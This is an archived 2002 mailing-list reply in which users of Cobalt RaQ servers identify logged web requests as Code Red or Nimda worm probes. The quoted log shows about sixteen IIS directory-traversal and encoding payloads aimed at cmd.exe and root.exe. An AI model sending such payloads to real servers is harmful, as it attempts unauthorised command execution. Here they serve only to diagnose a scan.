[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] Raq4 Intrusion

Subject: Re: [cobalt-users] Raq4 Intrusion
From: Nell Bolen <nell@xxxxxxxxxxxxxx>
Date: Thu Feb 14 10:45:21 2002
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

Torsten Ewald wrote:
> 
> Hi,
> this means, that someoneis scanning your sever for activating a Code Red
> Virus which is only dangerous for a windows system. Because of your Linux
> System, you can reject this message. You can see, that someone is looking
> for Code Red by Requesting the program "root.exe".
> 
> Regards
> Torsten
> 
> ----- Original Message -----
> From: <lewis.tim@xxxxxxxxxx>
> To: <cobalt-users@xxxxxxxxxxxxxxx>
> Sent: Thursday, February 14, 2002 11:01 AM
> Subject: [cobalt-users] Raq4 Intrusion
> 
> >
> > Hi
> > Any ideas on nature of this intrusion:-
> >  "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 228 "-" "-"
> >  "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 226 "-" "-"
> >  "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 236 "-" "-"
> >  "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 236 "-" "-"
> >  "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 252
> "-" "-"
> >  "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 302 273 "-" "-"
> >  "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 302 273 "-" "-"
> >  "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 302 301 "-" "-"
> >  "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 253
> "-" "-"
> >  "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 645
> "-" "-"
> >  "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 253
> "-" "-"
> >  "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 253
> "-" "-"
> >  "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> "-" "-"
> >  "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> "-" "-"
> >  "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302
> 252 "-" "-"
> >  "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 252
> "-" "-"
> > thanks
> > Lewis

Actually, I think it's Nimda, which  only adds to your access log. See
list archives for details.

Regards, Nell Bolen
nell@xxxxxxxxxxxxxx

References:
- [cobalt-users] Raq4 Intrusion
  - From: lewis . tim
- Re: [cobalt-users] Raq4 Intrusion
  - From: Torsten Ewald

Prev by Date: [cobalt-users] Annoying email "service" seems to be "servicing" my RaQ3
Next by Date: Re: [cobalt-users] Annoying email "service" seems to be "servicing" my RaQ3
Previous by thread: Re: [cobalt-users] Raq4 Intrusion
Next by thread: RE: [cobalt-users] Raq4 Intrusion

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index